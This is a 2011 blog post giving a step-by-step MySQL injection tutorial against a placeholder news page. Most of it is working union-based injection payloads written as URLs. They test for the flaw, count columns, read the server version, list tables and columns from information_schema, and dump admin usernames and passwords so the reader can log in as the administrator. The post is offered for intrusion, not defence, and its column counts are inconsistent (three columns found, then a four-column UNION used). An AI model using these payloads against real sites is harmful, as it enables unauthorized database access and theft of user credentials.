Sunday, September 25, 2011

MySQL Injection

MYSQL injection

Check for vulnerability:
------------------------
Let's say that we have some site like this
http://www.site.com/news.php?id=5
Now to test if is vulrnable we add to the end of url ' (quote),
and that would be http://www.site.com/news.php?id=5'
so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar
that means is vulrnable to sql injection :)
Find the number of columns:
----------------------------
To find number of columns we use statement ORDER BY (tells database how to order the result)
so how to use it? Well just incrementing the number until we get an error.
http://www.site.com/news.php?id=5 order by 1/* <-- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* <-- no error
http://www.site.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)
that means that the it has 3 columns, cause we got an error on 4.
Check for UNION function:
-------------------------
With union we can select more data in one sql statement.
so we have
http://www.site.com/news.php?id=5 union all select 1,2,3/*
NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.
(we already found that number of columns are 3 in section 2). )
if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works :)
Check for MySQL version:
------------------------
http://www.site.com/news.php?id=5 union all select 1,2,3,4/*
let say that we have number 4 on the screen, now to check for version
we replace the number 4 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.
The version should be greater than 5 , if its less than 5 you should guess the table name.
Getting table and column name:
-------------------------------
http://www.site.com/news.php?id=5 union all select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
we get table names.check for table name admin of some login user.
now to check column names.
To check the columns replace the word “table” with column
http://www.site.com/news.php?id=5 union all select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=hex_value
note: the table should be in hex value.(this works mostly)
we get columns displayed on screen, userid, passwd etc...
now to retrieve values use:
http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
now we get dislayed username:password on screen, i.e admin:admin or admin:somehash
when you have this, you can login like admin or some superuser :D

0 comments:

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More